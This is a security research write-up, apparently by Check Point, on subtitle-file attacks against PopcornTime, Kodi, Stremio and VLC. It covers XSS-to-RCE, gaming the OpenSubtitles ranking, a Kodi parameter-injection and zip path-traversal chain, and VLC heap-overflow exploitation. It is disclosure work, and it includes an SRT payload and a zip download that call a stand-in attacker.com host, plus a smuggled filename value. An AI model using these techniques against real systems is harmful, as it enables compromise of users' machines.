Background
Recently, Check Point researchers revealed a brand new attack vector – attack by subtitles. As discussed in the previous post and in our demo, we showed how attackers can use subtitles files to take over users’ machines, without being detected.
The attack vector entailed a number of vulnerabilities found in prominent streaming platforms, including VLC, Kodi (XBMC), PopcornTime and strem.io.
The potential damage the attacker could inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.
After our original publication appeared, the vulnerabilities were fixed, which allows us to tell the full tale and share the technical details of the attack.
PopcornTime
Developed as an open source project in just a couple of weeks, the multi-platform “Netflix for pirates” integrated the deadly combination of a bit Torrent client, a video player, and endless scraping capabilities under a very friendly graphical user interface.
Gaining massive popularity and plenty of attention from mainstream media ([1], [2]) for its ease-of-use and vast movie collection, the program was abruptly taken down due to pressure from the Motion Picture Association Of America.
After its discontinuation, the PopcornTime application was forked by various different groups to maintain the program and develop new features. Members of the original PopcornTime project announced that they would endorse the popcorntime.io (that meanwhile turned into popcorntime.sh) project as the successor to the original discontinued Popcorn Time.
The webkit powered interface is packed with movie information and metadata. It presents trailers, plot summaries, cast information, cover photos, IMDB ratings and much more.
Subtitles in PopcornTime
To make the user’s life even easier, subtitles are fetched automatically. Can this behavior be exploited? (Hint: Yes)
Behind the scenes, PopcornTime uses open-subtitles as their sole subtitle provider. With over 4,000,000 entries and a very convenient API, it is an extremely popular repository.
This API not only allows for easy search and download of subtitles, but it also has a recommendation algorithm to help you find the right file for your movie and release.
Attack Surface
As mentioned earlier, PopcornTime is webkit based, NW.js to be exact.
Previously known as node-webkit, the NW.js platform lets the developer use web technologies such as HTML5, CSS3 and WebGL in his native applications.
Moreover, the Node.js API and 3rd party modules can be directly called from the DOM.
Essentially, an NW.js application is a web page for any matter, all code is written in JavaScript or HTML and styled with CSS. Like any web page, it may be vulnerable to an XSS attack. In this case, due to the fact that it is running on a node js engine, XSS allows the usage of the server side capabilities. In other words, XSS is actually RCE.
Ready… Set… Go!
Our journey begins as soon as the user starts playing a movie.
PopcornTime issues a query using the previously mentioned API and downloads the recommended subtitle (we will dive deeper into that process later on, as it turns out to be a key step in our striving for world domination).
Next, PopcornTime tries to transcode the file into the .srt format:
After various decoding and parsing functions, the created element (a single subtitle) is appended to the display at the right time, using the “cues” array:
This enables us to add any html object to the view.
Obviously, a complete control over any HTML element is dangerous by itself. However, when dealing with node based applications, it is important to understand that XSS equals RCE.
System commands can be easily executed using modules such as child_process.
Once our unsanitized JavaScript is loaded to the display, code execution is just a few lines away.
A basic SRT file looks something like this:
1
00:00:01,000 –> 00:00:05,000
Hello World
Instead of the “Hello World” text, we can use an HTML tag – the image tag.
We try to load an inexistent image and provide it with the onerror attribute.
As seen in Figure 4, we use the onerror attribute JavaScript capabilities to remove the revealing icon of the broken image and append our malicious remote payload to the page. Needless to say, evil.js (Figure 5) will pop the traditional calc.exe.
OpenSubtitles – The Watering Hole
So we can execute code on PopcornTime.
Client-side vulnerabilities are valuable, but they tend to rely on some user interaction.
For successful exploitation to occur, a link has to be clicked, a pdf must be read, or a site needs to be hacked.
In the case of subtitles, the user needs to load the malicious subtitles. Can we somehow omit this step?
We all know that subtitles are carelessly fetched from open communities around the internet and treated as harmless text files. So after we proved these files can be dangerous, we took a step back and looked at the bigger picture.
With over 4,000,000 entries and an average of 5,000,000 daily downloads, OpenSubtitles is the largest online community for subtitles.
Their extensive API is also widely integrated into many other video players.
They even offer a smart search capability which is a chained function that returns the best matching subtitles based on the information you provide.
The question remains: Can we manipulate this API to eliminate any user interaction and make sure a malicious subtitle stored on OpenSubtitles is the one automatically downloaded?
API Drill Down
When a user starts playing a movie, a SearchSubtitles request is immediately sent, resulting in an XML containing all the subtitle objects that match our criteria (IMDBid).
In figure 6, we see the search criteria is “imdbid”, and the response in figure 7 contains all subtitles matched by imdbid.
Now comes the interesting part, as the API has an algorithm that ranks subtitles based on their filename, IMDBid, uploader rank, etc.
Skimming through the documentation, we discovered this ranking scheme:
In figure 8, we see how many points are added to the subtitles ranking, based on the matching criteria, such as: tag, IMDBid, uploading user, etc.
According to the chart, assuming we (as “user|anon”) upload our malicious subtitles to OpenSubtitles, our subtitles will only get 5 points.
But here we learned a valuable lesson: reading the documentation is not enough, as the source code revealed an undocumented behavior.
The matchTags function:
The request sent by PopcornTime specified only IMDBid (as seen in figure 6), which means that the condition of MatchedBy === ‘tag’ will forever be false.
This calls the function matchTags():
The matchTags function breaks down the filename of the movie and the subtitle to tags.
A tag is basically an isolated word or number found in the file name, and these are usually separated by dots (“.”) and dashes (“-“).
The amount of shared tags between the movie file name and the subtitles file name is then divided by the number of movie tags, and multiplied by a maxScore of 7, which is the maxScore that can be assigned in case of full compatibility between the two filenames.
For example, if the movie file name is “Trolls.2016.BDRip.x264-[YTS.AG].mp4”, the tags are the following list:
[Trolls, 2016, BDRip, x264, YTS, AG, mp4]
As the name of the movie file name that the application (e.g PopcornTime) is downloading can easily be discovered (by using a sniffer), we can make sure our subtitle file has exactly the same name, but ending with the “srt” extension – rewarding the subtitles rank with an extra 7 points (!).
Quick Recap
Putting it all together, we can confidently achieve a score of 12. The match of IMDBid is trivial(+5), and knowing the specific release used by torrent sites and PopcornTime is as easy as opening a packet sniffer. So we can make the malicious subtitles result in full compatibility(+7).
This is a fairly good score but we are still not satisfied.
These are the recommended subtitle scores for some of the most popular content available on-line: Snowden, Deadpool, Inception, Rogue One: A Star Wars Story and Frozen:
These graphs (figure 11) show the score for the 7 most popular languages in the world, and display their average and highest score. Skimming automatically through a bunch of popular subtitles, we noticed that the highest score a subtitle got is 14, while the average is around 10.
Reviewing the scoring system once more, we realized we can move up in the ranks quite easily.
Apparently all it takes is 101 subtitle uploads to be a gold member.
So we signed up to OpenSubtitles, and 4 minutes and 40 lines of Python later, we were golden.
We wrote a small script that shows all available subtitles for a given movie. In the following image, you can see that our subtitles had the highest score of 15 (!):
What this basically means is, given any movie, we can force the player to load our crafted malicious subtitles and exploit the machine.
KODI
KODI, formerly known as XBMC, is an award winning open-source, cross-platform media player and an entertainment hub. Available in all major platforms (Windows, Linux, Mac, iOS and Android), 72 languages, and used by over 40 million people, it is probably the most commonly used Media Center software around. KODI is also a popular combination with Smart TVs and Raspberry-Pis making it interesting from the attackers’ perspective.
Subtitles in KODI
Like many other KODI features, subtitles are managed by Python plugins.
The most common subtitle plugin is Open-Subtitles, and as we are already familiar with their API, let’s dive right in to the subtitles download process.
The plugin searches for subtitles using the following function:
searchsubtitles() retrieves a list of subtitles, including their metadata, from OpenSubtitles.
A for loop iterates over these subtitles and adds them using addDirectoryItem() to the GUI as shown below:
As you can in figure 15, the string sent to addDirectoryItem() is:
plugin://%s/?action=download&link=%s&ID=%s&filename=%s&format=%s
As Open-Subtitles is, well, open, an attacker has control over the filename parameter received under the value of SubFileName as seen below.
Given the fact that the filename is completely controlled by an attacker, it is also possible to overwrite the previous parameters such as link and ID by uploading a file named:
Subtitles.srt&link=<controlled>&ID=<controlled>
Which results in the following string:
plugin://%s/?action=download&link=%s&ID=%s&filename=Subtitles.srt&link=<controlled>&ID=<controlled>&format=%s
This overwrite is possible due to the use of a basic split function when parsing the string.
Both of these tampered parameters are crucial for the function that runs after the user selects one of the options available in the subtitle menu (as seen in figure 16).
Once the user chooses an item from the subtitles menu, it is sent to Download():
Now that we control all the parameters passed to it, we can abuse its functionality.
By providing an invalid id (like “-1”), we reach the “if not result” branch. This branch is supposed to download “raw” archives in case the Open-Subtitles API fails to fetch the necessary file.
With the url parameter at our disposal, we can make it download any zip file that we wish (such as http://attacker.com/evil.zip).
Downloading an arbitrary zip archive from the internet is careless, but chaining this behavior with another vulnerability found in KODI’s built-in extraction makes it lethal.
Auditing ExtractArchive(), we noticed it concatenates the strPath(extraction destination path) to strFilePath(the file path inside the archive as yielded by the iterator).
Constructing a zip containing folders named “..” recursively allowed us to control the extraction destination path (CVE-2017-8314).
Using this directory traversal weakness, we overwrote KODI’s own subtitle plugin.
Overwriting the plugin means that KODI will soon execute our file. Our malicious Python code can be an exact duplicate of the original plugin, with the addition of any desired malicious behavior.
Stremio
PopcornTime definitely marked the rise of streaming apps, but when it was abruptly shut down by the MPAA, users were left looking for alternatives.
Stremio, a semi-open source content aggregator, offered just that. Like PopcornTime, it is designed with ease of use in mind and has a similar user interface. Interestingly enough, Stremio shares a few characteristics with PopcornTime under the hood as well. Most importantly for us, it is a web-kit based application that uses Opensubtitle.org as its subtitle provider.
Strem.IO also adds the subtitles content to the webkit interface, so we assumed XSS would be a good direction here as well.
However, trying the same technique that worked on PopcornTime failed:
We can see the broken image at the bottom (Figure 21), but no code was executed.
Apparently, our JavaScript has been sanitized. It was time to dig a little deeper.
Stremio code is archived as an ASAR file, a simple TAR like format that concatenates all files together without the compression. Extracting the source code and prettifying it, we realized that any text added to the screen is passed through Angular-Sanitize.
The sanitize service will parse an HTML and only allow safe and white-listed markup and attributes to survive, thus sterilizing a string so it contains no scripting expressions or dangerous attributes. Being forced to use only static HTML tags with no scripting capabilities really limited our options. The situation called for a creative solution.
If you ever used Stremio, you are probably familiar with their “Support us” pop up banner.
Using the HTML <img> tag, we were able to present an exact copy of that banner right in the middle of the screen. Wrapping it with an <a href> tag meant that clicking the close button redirects this web-kit instance to our unsanitized page:
1
00:00:01,000 –> 00:01:00,000
<a href=”http://attacker.com/evil.js”><img src=”http://attacker.com/support.jpg”></a>
That page is exactly the same as the evil.js in the PopcornTime attack, which utilized the nodejs capabilities to execute code on the victim’s machine.
VLC – The Obvious Target
Introduction
Once we realized the disastrous potential of subtitles as an attack vector, our next target was obvious. With over 180,000,000 users, VLC is one of the most popular media players out there.
This open-source, portable, cross-platform media player\streamer is available for almost any platform imaginable: Windows, OS X, Linux, Windows Phone, Android, Tizen and iOS. It is practically everywhere.
Described by its own authors as a “very popular, but quite large and complex piece of software”, we were confident subtitles-related vulnerabilities exist here as well.
Design
VLC is, in fact, a complete multimedia framework (like DirectShow or GStreamer) where you can load and plug-in many modules dynamically.
The core framework does the “wiring” and the media processing, from input (files, network streams) to output (audio or video, on a screen or a network). It uses modules to do most of the work at every stage (various demuxers, decoders, filters and outputs)
Below is a chart that represents the principal module capabilities implemented in VLC:
Subtitles
Maybe this would be a good time to take a short break from VLC and discuss the complete chaos that is the world of subtitles formats.
During our research we encountered more than 25 (!) subtitle formats. Some are binary, some are textual, and only a few are well documented.
It is common knowledge that SRT supports a limited set of HTML tags and attributes, but we were quite surprised to learn about other exotic functionalities offered by various formats. SAMI subtitles, for example, allows for embedded images. SSA supports definition of multiple themes\styles and then refers to them from each subtitle. ASS even allows binary font embedding. The list goes on and on.
Usually there are no libraries to parse all these formats, which leaves the task to each and every developer. Inevitably, things go wrong.
Back to VLC
Textual subtitles are parsed by VLC in its demuxer called subtitle.c.
Below are all the formats it supports and their parsing functions.
The demuxers’ only job is to parse the different timing conventions of each of the formats and send every subtitle to its decoder. Other than SSA and ASS that are decoded by the open-source library libass, all these formats are sent to VLC’s own decoder subsdec.c.
subsdec.c parses the text field of every subtitle and creates two version of it. The first is a plain text version with all tags, attributes and styling stripped off.
This is used in case later rendering fails.
The second, more feature-rich version is referred to as the HTMLsubtitle. HTML subtitles contain all the fancy styling attributes such as fonts, alignment etc.
After they are decoded, subtitles are sent to the final stage of rendering. Text rendering is mostly done using the freetype library.
That pretty much sums up the life span of a subtitle from load to display.
Bug Hunting
Going over the VLC subtitle related code, we immediately noticed a lot of parsing is done using raw pointers instead of built-in string functions. This is generally a bad idea.
For example, while consuming the possible attributes of a font tag, such as family, size or color, VLC fails to validate the end of the string in some places. The decoder will continue reading from the buffer until a ‘>’ is met, skipping any Null terminator. (CVE-2017-8310)
Fuzzing
While auditing the code manually, we also started fuzzing VLC for subtitles related vulnerabilities.
Our weapon of choice was the brilliant AFL. This security-oriented fuzzer employs compile-time instrumentation and genetic algorithms to discover new internal states and trigger edge cases in the targeted binary. AFL has already found countless bugs, and given the right corpus, it is capable of providing very interesting test cases in a fairly short time.
For our corpus, we downloaded and rewrote several subtitle files with different functionalities in various formats.
To avoid the rendering and display of the video (our fuzzing server did not have any graphical interface), we used the transcode functionality to convert a short movie containing nothing but black screen from one codec to another.
This is the command we used to run AFL:
./afl-fuzz –t 600000 –m 2048 –i input/ -o output/ –S “fuzzer$(date +%s)” -x subtitles.dict — ~/sources/vlc-2.2-afl/bin/vlc-static –q –I dummy –subfile
@@ -sout=‘#transcode{vcodec=“x264”,soverlay=“true”}:standard{access=”file”,mux=”avi”,dst=”/dev/null”}’ ./input.mp4 vlc://quit
The Victim
It didn’t take AFL long to find a vulnerable function: ParseJSS. JSS, which stands for JACO Sub Scripts files. JACOsub is a very flexible format allowing for timing manipulations (like shifts), inclusion of external JACOsub files, clock pauses and many other tricks that can be found in its full specification.
JACO script relies heavily on directives. A directive is a series of character codes strung together. They determine a subtitle’s position, font, style, color, and so forth. Directives affect only the single subtitle to which they are prepended.
The crash found by AFL was due to an out-of-bound read while trying to skip unsupported directives (a functionality which is not fully implemented yet) – CVE-2017-8313.
In case a directive is written without any following spaces, this while loop will skip the Null byte terminating psz_text over-running the buffer. Here, and throughout the code, psz_text is a pointer to a Null terminated string allocated on the heap.
This drew our attention to the ParseJSS function and we soon manually found another two out-of-bound read issues in the parsing of other directives. This time, it was the parsing of shift and time directives (cases ‘S’ and ‘T’ respectively). This happens due to the fact that the shift can be greater than the psz_text length (CVE-2017-8312).
The aforementioned VLC vulnerabilities, while enabling attackers to crash the program, weren’t sufficient for us. We were after code execution, and for that we needed a vulnerability which enables an attacker to write some data. We continued reading the ParseJSS function and looked at other directives.
The C[olor] and F[ont] directives granted us some more powerful primitives. Due to a faulty double increment, we were able to skip the delimiting Null byte and write outside the buffer. This heap based overflow allowed us to ultimately execute arbitrary code (CVE-2017-8311).
In another case, VLC INTENTIONALLY SKIPS THE NULL BYTE (line 1883)
This behavior resulted in a heap buffer overflow as well.
Exploitation
VLC supports many platforms – OSs and hardware architectures. Each platform may have some different characteristics and heap implementation details that affect the exploitation. From pointer sizes to caching, everything matters.
In our PoC, we decided to exploit Ubuntu 16.04 x86_64. As a modern and popular platform demonstrates, the PoC is applicable to the real world. Having an open-source implementation of the heap lets us explain and understand in great detail the bits of the exploitation process.
There are a (very) few general purpose heap exploitation techniques for GLibC-malloc that survived through the years. However, the conditions in which this vulnerability happens prevent us from using any of these methods.
Our only option is to use the vulnerability as a write primitive to overwrite some application specific data. This overwritten data, in turn, will either lead to stronger primitives (write what where) or complete control over code execution.
VLC is a highly threaded application, and due the implementation of the heap, it means that every thread has its own heap arena. This limits the number of objects we may overwrite – only objects that are allocated in the thread that handles subtitles. Also, it’s much more likely we can overflow an object that is allocated in the vicinity of the code used to trigger the vulnerability (or used for Feng Shui; more on that later).
The code running since the creation of our thread and the vulnerable function is not too long. We manually started looking for objects that seem useful. We came up with demux_sys_t and variable_t. Also, by automatically tracking every allocated object on the heap, we also found link_map, es_out_id_t and some Qt objects which had virtual tables in them. By process of elimination, we eventually picked variable_t object to be the victim.
This object is used for holding variable types of data within the VLC application, including the module’s configuration values and command line options. There are plenty of them all over, which increases our chances of manipulating the heap to have a free slot before one of them. The variable_t struct has a p_ops field which holds a pointer to function pointers that operate the value of the variable. Controlling this field enables an attacker to gain control over the program.Other objects were either not exploitable or posed too many restrictions.
Now that we have a victim object, we must ensure we can allocate a JACOSubScript (JSS) subtitle before it. This process of manipulating the heap a predictable and useful state is called Heap Feng Shui (a.k.a. Heap-Fu or Grooming).Fortunately, we were quite lucky this time. By mere chance, we happen to have a hole right before a victim object, the variable_t for `”sub-fps”`.
Even though we didn’t have to use any other heap shaping primitive, we did find a very promising and interesting code flow which can be of great aid, in case a more subtle design is required. When opening a subtitles file, VLC doesn’t know which module to use for parsing the new file. VLC’s architecture is very modular, and when parsing a file, it looks at all its modules (libraries), loads them and checks whether they know how to parse the given stream (in this case, file). The vulnerable code resides in the subtitle module, but it’s not the first module loaded. Two modules earlier, the VobSub module is loaded and checks whether the subtitles are of VobSub format. We can trick this module to think our file is actually a VobSub file by putting the VobSub magic constant in the first line. Then, this module starts parsing the file, making various allocations and de-allocations. This code runs before allocating the victim object. So this nice VobSub/JSS polyglot can be used for Feng Shui.
The vulnerability enabled us to linearly override data after an allocated subtitle string. This posed a major problem, the variable_t struct’s first field is psz_name which is assumed to be a pointer to string. This pointer is dereferenced a few times in the life-cycle of VLC. As the ParseJSS function copies strings, we can’t write NULL bytes, which are the top two bytes of a valid pointer. Therefore, we can’t write valid pointers and must not overflow naively into the variable_t struct. To overcome this problem, we abused the heap’s metadata. We used a complex series of allocation-overflow-deallocation sequence and overwrote chunks’ size metadata (“The poisoned NULL byte, 2014 edition” style). This enabled us to overwrite the p_ops field in the variable_t structure without overrding the psz_name field.
Now, we find ourselves facing the eternal question, what should we write? The p_ops field is used in the Destroy function, when closing VLC. The code invokes the pf_free function in the array pointed to by this field and passes the value as a parameter. So we need to put a pointer to a pointer to our first gadget (actually, 16 bytes before). Our main problem here is ASLR. We don’t know where anything is. Welcome to the hellish world of scriptless exploitation.
One way to overcome this problem is partial overwrite. The original pointer points to the float_ops static array in the libvlccore library. We can partially overwrite this value and make it point somewhere else within this library.
Another viable option is to point to the main binary which, in ubuntu, is not randomized. We found some very interesting gadgets in the main binary. For example, a gadget that invokes dlysm and then invokes the result with another register as first argument (in code: dlsym(-1, $rsi)($rbx)).
A third way to overcome this problem is to make a partial copy. As our vulnerability copies from beyond a chunk boundary, we can manipulate the heap to write a heap pointer in the chunk and then partially copy it.
While these options seem very promising, we didn’t follow this road. Scriptless exploitation poses many challenges, and it is too much to investigate for the sake of a demo. Instead, we disabled the ASLR and pointed to our heap. The address of the arena changed a little, most likely depending on the threading behavior, but it was statistically fine to assume it will be in a certain address. Our next question is, where within the arena should we point to? VLC reads the subtitles file line by line and copies each line to chunk on the heap. The low-level line reading mechanism poses a synthetic limit on the line’s size of 204800 bytes.
We put our data in the longest allowed line and found out where it is statistically. We built a ROP-chain based libvlccore and put a nice long sled in the beginning. Then, we roughly pointed the p_ops field to our sled and launched VLC with our subtitles file. Lo and behold, a gnome-calculator popped up.
Summary
We showed that by using various vulnerabilities, we could exploit the most popular streaming platforms and take over the victims’ machines. The vulnerabilities types ranged from simple XSS, through logical bugs, up to memory corruptions.
Being extremely widespread, these media players (and we believe others as well), provide a very vast attack service, potentially affecting hundreds of millions of users.
The main lesson learned is that even overlooked areas, however benign they may seem, can be taken advantage of by attackers looking for a way into your system. We will continue to look for and understand how these breaches can be exploited, and protect users against attackers.